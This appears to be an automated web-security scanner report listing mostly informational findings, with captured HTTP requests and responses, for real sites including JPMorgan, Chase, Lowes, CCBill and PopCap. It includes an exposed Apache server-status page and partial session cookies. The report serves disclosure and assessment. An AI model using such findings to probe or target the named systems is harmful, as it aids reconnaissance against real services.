HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:54 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"34319-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:54 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 34319 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ (function(){var D=YAHOO.util.Dom,B=YAHO ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/yahoo-dom-event |
GET /js/yui/yahoo-dom-event Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"37005-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 37005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2009, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.0r4 */ if(typeof YAHOO=="undefined"|| ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://store.popcap.com |
Path: | /payment.php |
GET /payment.php HTTP/1.1 Host: store.popcap.com Connection: keep-alive Referer: https://store.popcap.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user_id=461b1f76-758a |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:48:32 GMT Server: Apache Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: user_profile=0030000 Set-Cookie: user_profile=0030000 Set-Cookie: user_profile=0030000 Set-Cookie: user_profile=0030000 Set-Cookie: user_profile=0030000 Set-Cookie: user_profile=0030000 Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 49903 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>PopCap Games - ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | / |
GET / HTTP/1.1 Host: support.ccbill.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:16 GMT X-Cnection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TScc32cb=2fb8cfb87da Content-Length: 13895 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>CCBill Credit Ca ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /js/ga.js |
GET /js/ga.js HTTP/1.1 Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:21 GMT Last-Modified: Thu, 11 Nov 2010 21:01:58 GMT ETag: "1834f1-6230-494cd48 Accept-Ranges: bytes Content-Length: 25136 X-Cnection: close Content-Type: application/x-javascript X-Pad: avoid browser bug Set-Cookie: TScc32cb=2fb8cfb87da (function(){var aa="_gat",ba="_gaq",r ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/css/base.css |
GET /style/css/base.css HTTP/1.1 Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:19 GMT Last-Modified: Wed, 08 Sep 2010 19:05:55 GMT ETag: "286bc1-3cf4-48fc433 Accept-Ranges: bytes Content-Length: 15604 X-Cnection: close Content-Type: text/css Set-Cookie: TScc32cb=2fb8cfb87da /* Lavidge Base HTML/CSS - Written By: Eric Florez - Last Updated: 2010-07-06 */ /* ====================== Page Formatting ======================== */ * { margin:0; padding:0; font-family:Verd ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/css/consumers.css |
GET /style/css/consumers.css HTTP/1.1 Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:17 GMT Last-Modified: Wed, 08 Sep 2010 20:06:02 GMT ETag: "33a641-1180-48fc50a Accept-Ranges: bytes Content-Length: 4480 X-Cnection: close Content-Type: text/css Set-Cookie: TScc32cb=2fb8cfb87da @import url(base.css); /* ====================== Page Formatting ======================== */ ul.list_arrow li, #left_nav li.current_page {background-image:url(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/background |
GET /style/img/background Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:21 GMT Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT ETag: "2cea04-11b-48fc418aa0440 Accept-Ranges: bytes Content-Length: 283 X-Cnection: close Content-Type: image/png Set-Cookie: TScc32cb=2fb8cfb87da .PNG . ...IHDR.......h......G..... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/background |
GET /style/img/background Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:21 GMT Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT ETag: "1674f1-362a-48fc418 Accept-Ranges: bytes Content-Length: 13866 X-Cnection: close Content-Type: image/png Set-Cookie: TScc32cb=2fb8cfb87da .PNG . ...IHDR...d................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/background |
GET /style/img/background Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:21 GMT Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT ETag: "33a652-79d-48fc418aa0440 Accept-Ranges: bytes Content-Length: 1949 X-Cnection: close Content-Type: image/png Set-Cookie: TScc32cb=2fb8cfb87da .PNG . ...IHDR.......d....."...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/buttons/btn |
GET /style/img/buttons/btn Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:22 GMT Last-Modified: Wed, 08 Sep 2010 19:00:02 GMT ETag: "2de9e6-b45-48fc41eec3080 Accept-Ranges: bytes Content-Length: 2885 Keep-Alive: timeout=60, max=60 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TScc32cb=2fb8cfb87da .PNG . ...IHDR...i...".....k...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/icons/bullet |
GET /style/img/icons/bullet Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:21 GMT Last-Modified: Wed, 08 Sep 2010 19:01:46 GMT ETag: "16756d-2e-48fc4251f1a80" Accept-Ranges: bytes Content-Length: 46 X-Cnection: close Content-Type: image/gif Set-Cookie: TScc32cb=2fb8cfb87da GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | /style/img/sprites/page |
GET /style/img/sprites/page Host: support.ccbill.com Connection: keep-alive Referer: https://support.ccbill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:23 GMT Last-Modified: Wed, 08 Sep 2010 19:03:23 GMT ETag: "13c85c-2b19-48fc42a Accept-Ranges: bytes Content-Length: 11033 X-Cnection: close Content-Type: image/png Set-Cookie: TScc32cb=2fb8cfb87da .PNG . ...IHDR.."6...R.....Py..... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /server-status |
GET /server-status HTTP/1.1 Host: www.lowes.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Date: Tue, 12 Jul 2011 21:32:27 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:02:26 GMT Set-Cookie: TS176ebc=1a0f9fe32c5 Content-Length: 353323 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <title>Apache Status</title> </head><body> <h1>Apache Server Status for www.lowes.com</h1> <dl><dt>Server Version: IBM_HTTP_Server ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT Accept-Ranges: bytes Content-Type: text/css Content-Length: 238055 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* Reset CSS */ body,div,dl,dt,dd,ul,ol ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 60109 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* * common.js * Common javascript to be run on every page of the Lowes.com web site. * * Copyright Lowes, Inc. * * Last Modified On 03/04/2010 * Modified By R. Adams */ var lowes= ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 154101 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* This is a compiled version of Dojo, built for deployment and not for development. To get an editable version, please visit: http://dojotoolkit.org for documentation and information on ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 72756 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* This is a compiled version of Dojo, built for deployment and not for development. To get an editable version, please visit: http://dojotoolkit.org for documentation and information on ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 11 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* empty */ |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /wcsstore/B2BDirectS |
GET /wcsstore/B2BDirectS Host: www.lowes.com Connection: keep-alive Referer: https://www.lowes.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Server: IBM_HTTP_Server Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT ETag: "1f8e59-22f6-dc02bc00" Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 8950 Expires: Wed, 13 Jul 2011 00:22:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: akaau=1310518355~id /* Nifty Corners Cube - rounded corners with CSS and Javascript Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it) This program is free software; you can redistribute it and/or modify it u ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.lowes.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-store, no-cache Expires: now Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 63497 Date: Wed, 13 Jul 2011 00:22:35 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:35 GMT Set-Cookie: TS176ebc=8af291dbf16 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.lowes.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4A |
HTTP/1.1 200 OK Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Tue, 12 Jul 2011 21:31:37 GMT Content-Length: 68157 Connection: keep-alive Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:37 GMT Set-Cookie: TS176ebc=3557926829e <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta chars ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.ri.gov |
Path: | /Licensing/renewal |
GET /Licensing/renewal Host: www.ri.gov Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=53040939 |
HTTP/1.1 302 Found Date: Wed, 13 Jul 2011 00:33:56 GMT Server: www Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 13 Jul 2011 00:33:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 27c333941c8c80ef374f Location: /Licensing/ Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=5, max=200 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cr=355|1|-8588954932 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1.1 CW-Server: cw-web81 Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/ Set-Cookie: cwbh1=357%3B07%2F17 Content-Type: image/gif Date: Tue, 12 Jul 2011 21:30:51 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://blog.katango.com |
Path: | /2011/07/05/how-facebook |
GET /2011/07/05/how-facebook Host: blog.katango.com Proxy-Connection: keep-alive Referer: http://blog.katango.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hiab=nnascar; __qca=P0-1347206192 |
HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Jul 2011 20:47:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding Vary: Cookie X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://blog.katango.com Link: <http://wp.me/p1Alwm-6p>; rel=shortlink Content-Length: 31215 <!DOCTYPE html> <!--[if IE 6]> <html id="ie6" dir="ltr" lang="en"> <![endif]--> <!--[if IE 8]> <html id="ie8" dir="ltr" lang="en"> <![endif]--> <!--[if (!IE)]><!--> <html dir="ltr" lang="en"> <!--<![e ...[SNIP]... <div id="wpl-button"><a href='http://blog.katango ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1160694 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.lowes.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Tue, 12 Jul 2011 21:30:49 GMT Expires: Tue, 12 Jul 2011 21:30:49 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 455 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://gw-services.vtrenz |
Path: | /WebCookies/Register |
GET /WebCookies/Register Host: gw-services.vtrenz.net Proxy-Connection: keep-alive Referer: http://trustedcs.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerb2b-gw |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Jul 2011 18:09:11 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | https://locator.chase.com |
Path: | / |
GET / HTTP/1.1 Host: locator.chase.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:08:54 GMT Server: Apache Set-Cookie: JSESSIONID=D0ADAAE16 Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 43237 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="https://www.chase <img src="/images/logo107x20 </a> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://locator.chase.com |
Path: | /LocatorAction.do |
